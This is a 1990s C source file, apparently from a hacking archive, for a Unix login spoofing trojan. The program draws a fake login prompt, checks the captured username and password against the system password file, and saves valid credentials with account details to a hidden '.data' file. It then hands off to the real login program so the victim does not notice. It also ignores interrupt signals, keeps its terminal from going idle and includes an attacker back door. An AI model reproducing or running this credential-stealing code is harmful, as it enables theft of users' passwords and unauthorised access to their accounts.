home *** CD-ROM | disk | FTP | other *** search
/ HaCKeRz Kr0nlcKLeZ 1 / HaCKeRz Kr0nlcKLeZ.iso / hacking / virriiorg / trojan-werd.c < prev    next >
Encoding:
C/C++ Source or Header  |  1996-04-23  |  9.9 KB  |  403 lines
  1. /* Program   : Unix login spoof
  2.    Author    : The Shining/UPi (UK Division)
  3.    Date      : Released 12/4/94
  4.    Unix Type : All unshadowed unix systems &
  5.                shadowed SUNOS systems
  6.    Note      : This file MUST be exec'd from the shell. */
  7.  
  8.  
  9. #include <stdio.h>
  10. #include <string.h>
  11. #include <signal.h>
  12. #include <pwd.h>
  13. #include <time.h>
  14. #include <utime.h>
  15.  
  16. #define OUTFILE ".data"           /* Data file to save account info into */
  17. #define LOGPATH "/usr/bin/login"  /* Path of real login program */
  18. #define DUMMYID "sync"            /* Dummy account on your system */
  19. #define DLENGTH 4                 /* Length of dummy account name */
  20.  
  21.  
  22. FILE *fp;
  23.  
  24.  
  25. /* Set up variables to store system time & date */
  26.  
  27. time_t now;
  28.  
  29. static int time_out, time_on, no_message, loop_cnt;
  30.  
  31.  
  32. /* Set up a structure to store users information */
  33.  
  34. struct loginfo {
  35.               char logname[10];
  36.               char key[9];
  37.               char *comment;
  38.               char *homedir;
  39.               char *shell;
  40.             } u;
  41.  
  42.  
  43. /* Use the unix function getpass() to read user password and
  44.    crypt() or pwdauth()  (remove it below if not SUNOS)
  45.    to validate it etc */
  46.  
  47. char *getpass(), *gethostname(), *alarm(), *sleep(),
  48.      *crypt(), *ttyname(), *pwdauth(), motd, log_date[60],
  49.      pass[14], salt[3], *tty, cons[] = " on console ",
  50.      hname[72], *ld;
  51.  
  52.  
  53. /* flag = exit status, ppid = pid shell, wait = pause length,
  54.    pwstat = holds 0 if valid password, shadow holds 1 if shadow
  55.    password system is being used, 0 otherwise. */
  56.  
  57. int flag, ppid, wait, pwstat, shadow, invalid;
  58.  
  59.  
  60. /* Declare main functions */
  61.  
  62.      void write_details(struct loginfo *);
  63.      void catch( void ), disable_interrupts( void );
  64.      void log_out( void ), get_info( void ),
  65.           invalid_login( void ), prep_str( char * );
  66.  
  67.  
  68. /* set up pointer to point to pwfile structure, and also
  69.    a pointer to the utime() structure */
  70.  
  71.  
  72. struct passwd *pwentry, *getpwnam();
  73. struct utimbuf *times;
  74.  
  75.  
  76. int main( void )
  77. {
  78. system("clear");
  79.  
  80. /* Initialise main program variables to 0, change 'loop_cnt' to 1
  81.    if you do not want the machines host name to appear with
  82.    the login prompt! (e.g. prompt is `login:` instead of
  83.    'MIT login:'  etc) */
  84.  
  85.      wait = 3;               /* Holds value for pause */
  86.       flag = 0;              /* Spoof ends if value is 1 */
  87.        loop_cnt = 0;         /* Change this to 1 if no host required */
  88.        time_out = 0;         /* Stops timer if spoof has been used */
  89.       time_on = 0;           /* Holds minutes spoof has been running */
  90.      disable_interrupts();   /* Call function to disable Interrupts */
  91.  
  92.  
  93. /* Get system time & date and store in log_date, this is
  94.    displayed when someone logs in as 'sync' */
  95.  
  96.  now = time(NULL);
  97.   strftime(log_date, 60, "Last Login: %a %h %d %H:%M:%S", localtime(&now));
  98.   strcat(log_date, cons);
  99.  ld = log_date;
  100.  
  101.  
  102. /* Get Hostname and tty name */
  103.  
  104. gethostname(hname, 64);
  105.  strcat(hname, " login: ");
  106. tty = ttyname();
  107.  
  108.  
  109. /* main routine */
  110.  
  111.   while( flag == 0 )
  112.   {
  113.        invalid = 0;        /* Holds 1 if id +/or pw are invalid */
  114.         shadow = 0;        /* 1 if shadow scheme is in operation */
  115.          no_message = 0;   /* Flag for Login Incorrect msg */
  116.         alarm(50);         /* set timer going */
  117.        get_info();         /* get user i.d. & password */
  118.  
  119.  
  120. /* Check to see if the user i.d. entered is 'sync', if it is
  121.    display system time & date, display message of the day and
  122.    then run the spoof again, insert the account of your
  123.    choice here, if its not sync, but remember to put
  124.    the length of the accounts name next to it! */
  125.  
  126.      if (strncmp(u.logname, DUMMYID, DLENGTH) == NULL) {
  127.         printf("%s\n", ld);
  128.  
  129.           if ((fp = fopen("/etc/motd", "r")) != NULL) {
  130.               while ((motd = getc(fp)) != EOF)
  131.                      putchar(motd);
  132.  
  133.               fclose(fp);
  134.           }
  135.  
  136.            printf("\n");
  137.              prep_str(u.logname);
  138.              no_message = 1;
  139.            sleep(wait);
  140.      }
  141.  
  142.  
  143. /* Check if a valid user i.d. has been input, then check to see if
  144.    the password system is shadowed or unshadowed.
  145.    If both the user i.d. & password are valid, get additional info
  146.    from the password file, and store all info in a file called .data,
  147.    then exit spoof and run real login program */
  148.  
  149.     setpwent();   /* Rewind pwfile to beign processing */
  150.  
  151.  
  152.     if ((pwentry = getpwnam(u.logname)) == (struct passwd *) NULL) {
  153.          invalid = 1;
  154.         flag = 0;
  155.     }
  156.     else
  157.        strncpy(salt, pwentry->pw_passwd, 2);
  158.  
  159.  
  160. /* Check for shadowed password system, in SUNOS, the field in /etc/passwd
  161.    should begin with '##', in system V it could contain an 'x', if none
  162.    of these exist, it checks that the entry = 13 chars, if less then
  163.    shadow system will probably be implemented (unless acct has been
  164.    disabled) */
  165.  
  166.  if ( invalid == 0 ) {
  167.  
  168.        if ((strcmp(salt, "##")) || (strncmp(salt, "x", 1)) == NULL)
  169.            shadow = 1;
  170.        else
  171.           if (strlen(pwentry->pw_passwd) < 13)
  172.              shadow = 1;
  173.  
  174.  
  175. /* If unshadowed, use the salt from the pwfile field & the key to
  176.    form the encrypted password which is checked against the entry
  177.    in the password file, if it matches, then all is well, if not,
  178.    spoof runs again!! */
  179.  
  180.     if ( shadow != 1 ) {
  181.  
  182.       if (strcmp(pwentry->pw_passwd, crypt(u.key, salt)) == NULL)
  183.          invalid = 0;
  184.       else
  185.          invalid = 1;
  186.     }
  187.  
  188.  
  189. /* If SUNOS Shadowing is in operation, use the pwdauth() function
  190.    to validate the password, if not SUNOS, substitute this code
  191.    with the routine I gave earlier! */
  192.  
  193.        if ( shadow == 1 ) {
  194.           if (pwstat = pwdauth(u.logname, u.key) == NULL)
  195.              invalid = 0;
  196.           else
  197.              invalid = 1;
  198.        }
  199. }
  200.  
  201.  
  202. /* If we have a valid account & password, get user info from the
  203.    pwfile & store it */
  204.  
  205.         if ( invalid == 0 ) {
  206.  
  207.            u.comment = pwentry->pw_gecos;
  208.             u.homedir = pwentry->pw_dir;
  209.            u.shell = pwentry->pw_shell;
  210.  
  211.           /* Open file to store user info */
  212.  
  213.            if ((fp = fopen(OUTFILE, "a")) == NULL)
  214.               log_out();
  215.  
  216.                write_details(&u);
  217.                 fclose(fp);
  218.                 no_message = 1;
  219.                flag = 1;
  220.         }
  221.         else
  222.            flag = 0;
  223.  
  224.         invalid_login();
  225.  
  226.     endpwent();                       /* Close pwfile */
  227.  
  228.     if (no_message == 0)
  229.        loop_cnt++;
  230.  
  231.   }                                  /* end while */
  232.  
  233. log_out();                           /* call real login program */
  234.  
  235. }
  236.  
  237.  
  238. /* Function to read user i.d. & password */
  239.  
  240. void get_info( void )
  241. {
  242.    char user[11];
  243.    unsigned int string_len;
  244.  
  245.    fflush(stdin);
  246.     prep_str(u.logname);
  247.     prep_str(u.key);
  248.    strcpy(user, "\n");
  249.  
  250.  
  251. /* Loop while some loser keeps hitting return when asked for user
  252.    i.d. and if someone hits CTRL-D to break out of spoof. Enter
  253.    a # at login to exit spoof. Uncomment the appropriate line(s)
  254.    below to customise the spoof to look like your system */
  255.  
  256.   while ((strcmp(user, "\n") == NULL) && (!feof(stdin)))
  257.   {
  258.    /* printf("Scorch Ltd SUNOS 4.1.3\n\n); */
  259.  
  260.     if (loop_cnt > 0)
  261.        strcpy(hname, "login: ");
  262.  
  263.       printf("%s", hname);
  264.       fgets(user, 9, stdin);
  265.  
  266.  
  267.    /* Back door for hacker, # at present, can be changed,
  268.       but leave \n in. */
  269.  
  270.      if (strcmp(user, "#\n") == NULL)
  271.          exit(0);
  272.  
  273.  
  274.     /* Strip \n from login i.d. */
  275.  
  276.      if (strlen(user) < 8)
  277.         string_len = strlen(user) - 1;
  278.      else
  279.         string_len = strlen(user);
  280.  
  281.      strncpy(u.logname, user, string_len);
  282.  
  283.  
  284.  
  285. /* check to see if CTRL-D has occurred because it does not
  286.    generate an interrupt like CTRL-C, but instead generates
  287.    an end-of-file on stdin */
  288.  
  289.      if (feof(stdin)) {
  290.          clearerr(stdin);
  291.         printf("\n");
  292.      }
  293.  
  294.   }
  295.  
  296.  
  297.  
  298. /* Turn off screen display & read users password */
  299.  
  300.      strncpy(u.key, getpass("Password:"), 8);
  301.  
  302. }
  303.  
  304.  
  305.  
  306. /* Function to increment the timer which holds the amount of time
  307.    the spoof has been running */
  308.  
  309. void catch( void )
  310. {
  311.   time_on++;
  312.  
  313.  
  314. /* If spoof has been running for 15 minutes, and has not
  315.    been used, stop timer and call spoof exit routine */
  316.  
  317. if ( time_out == 0 ) {
  318.    if (time_on == 15) {
  319.        printf("\n");
  320.         alarm(0);
  321.        log_out();
  322.    }
  323. }
  324.  
  325.  
  326. /* 'Touch' your tty, effectively keeping terminal idle time to 0 */
  327.  
  328.  utime(tty, times);
  329. alarm(50);
  330. }
  331.  
  332.  
  333.  
  334. /* Initialise a string with \0's */
  335.  
  336. void prep_str( char str[] )
  337. {
  338. int strl, cnt;
  339.  
  340. strl = strlen(str);
  341. for (cnt = 0; cnt != strl; cnt++)
  342.     str[cnt] = ' ';
  343. }
  344.  
  345.  
  346. /* function to catch interrupts, CTRL-C & CTRL-Z etc as
  347.    well as the timer signals */
  348.  
  349. void disable_interrupts( void )
  350. {
  351.    signal(SIGALRM, catch);
  352.     signal(SIGQUIT, SIG_IGN);
  353.      signal(SIGTERM, SIG_IGN);
  354.     signal(SIGINT, SIG_IGN);
  355.    signal(SIGTSTP, SIG_IGN);
  356. }
  357.  
  358.  
  359. /* Write the users i.d., password, personal information, homedir
  360.    and shell to a file */
  361.  
  362. void write_details(struct loginfo *sptr)
  363. {
  364.  
  365.    fprintf(fp, "%s:%s:", sptr->logname, sptr->key);
  366.     fprintf(fp, "%d:%d:", pwentry->pw_uid, pwentry->pw_gid);
  367.      fprintf(fp, "%s:%s:", sptr->comment, sptr->homedir);
  368.     fprintf(fp, "%s\n", sptr->shell);
  369.    fprintf(fp, "\n");
  370. }
  371.  
  372.  
  373.  
  374. /* Display login incorrect only if the user hasn't logged on as
  375.    'sync' */
  376.  
  377. void invalid_login( void )
  378. {
  379.  
  380.          if ( flag == 1 && pwstat == 0 )
  381.             sleep(wait);
  382.  
  383.          if ( no_message == 0 )
  384.             printf("Login incorrect\n");
  385. }
  386.  
  387.  
  388. /* Displays appropriate message, exec's the real login program,
  389.    this replaces the spoof & effectively logs spoof's account off.
  390.    Note: this spoof must be exec'd from the shell to work */
  391.  
  392. void log_out( void )
  393. {
  394.   time_out = 1;
  395.  
  396.    if ( no_message == 1 ) {
  397.         sleep(1);
  398.        printf("Login incorrect\n");
  399.    }
  400.  
  401.    execl(LOGPATH, "login", (char *)0);
  402. }
  403.